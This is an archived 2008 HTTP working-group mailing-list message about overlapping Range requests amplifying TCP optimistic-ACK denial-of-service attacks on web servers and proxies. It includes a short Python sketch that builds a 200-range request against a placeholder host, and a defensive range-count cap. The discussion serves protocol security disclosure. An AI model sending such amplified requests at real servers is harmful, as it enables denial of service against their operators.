- From: Stefanos Harhalakis <v13@v13.gr>
- Date: Sun, 12 Oct 2008 21:21:43 +0300
- To: Julian Reschke <julian.reschke@gmx.de>
- Cc: ietf-http-wg@w3.org
Hello Julian,

On Saturday 11 October 2008, Julian Reschke wrote:
> V13 wrote:
> > Allowing overlapping ranges permits the client side to request more data
> > than the largest file available at the server side. It is trivial to
> > construct a 100MB file request from 200 overlapping partial requests of a
> > 500K file. This allows the TCP optimistic ACK attack [1] to be performed
> > on web servers all over the world.
>
> I agree that this is a nice DOS scenario, but wouldn't it be possible to
> do the same just with a bunch of concurrent, repeating GET requests on
> the same URI?

Indeed, repeated GET requests would have the same result, but they would be a bit less robust: for every repeated request that the client side transmits, there is a (not so small) possibility of the request being lost. If this problem is of size X, then it is practically multiplied by the number of overlapping ranges that the client side can pack into a single request. (A rough sketch of such a request is included at the end of this message.)

Also, I can't think of a method for rejecting repeated ranges without leaving the server side somehow vulnerable to a connection carrying 1 million 1-byte range requests, unless there is a maximum limit on the number of ranges per request.

p.s.1 This attack also affects proxies.

p.s.2 IIS seems to limit the number of ranges per request to ~5 (I don't remember the exact number).
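For concreteness, here is a minimal sketch (in Python) of the kind of request described above. The host name "server.example", the path "/file.bin", and the sizes are made-up illustrations, not taken from any real server:

    # Build one GET request whose Range header asks for 200 overlapping
    # spans of a ~500 KB resource, i.e. roughly 100 MB of response data
    # from a single small request.
    FILE_SIZE = 500 * 1024   # assumed size of the target resource, in bytes
    N_RANGES = 200           # number of overlapping ranges to request

    # Each range starts one byte later than the previous one but runs to
    # the end of the file, so all 200 ranges overlap almost completely.
    ranges = ",".join("%d-%d" % (i, FILE_SIZE - 1) for i in range(N_RANGES))

    request = (
        "GET /file.bin HTTP/1.1\r\n"
        "Host: server.example\r\n"
        "Range: bytes=%s\r\n"
        "Connection: close\r\n"
        "\r\n"
    ) % ranges

    print(request)

Combined with the optimistic ACK attack [1], the client never has to actually receive those 100 MB; it only has to keep acknowledging ahead of the data the server has sent.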
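On the server side, the cap mentioned in p.s.2 could look like the following sketch; the name MAX_RANGES and the parsing here are illustrative assumptions, not how IIS actually implements its limit:

    # Reject a Range header carrying more than MAX_RANGES range-specs
    # before doing any real work.  MAX_RANGES = 5 mirrors the limit that
    # IIS reportedly applies.
    MAX_RANGES = 5

    def range_header_acceptable(value):
        # This sketch only handles the "bytes" range unit.
        if not value.startswith("bytes="):
            return False
        specs = value[len("bytes="):].split(",")
        return len(specs) <= MAX_RANGES

    # The 200-range request sketched above would be rejected:
    assert not range_header_acceptable(
        "bytes=" + ",".join("%d-511999" % i for i in range(200)))
    # ...while an ordinary two-range request passes:
    assert range_header_acceptable("bytes=0-99,100-199")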
Received on Sunday, 12 October 2008 18:22:36 UTC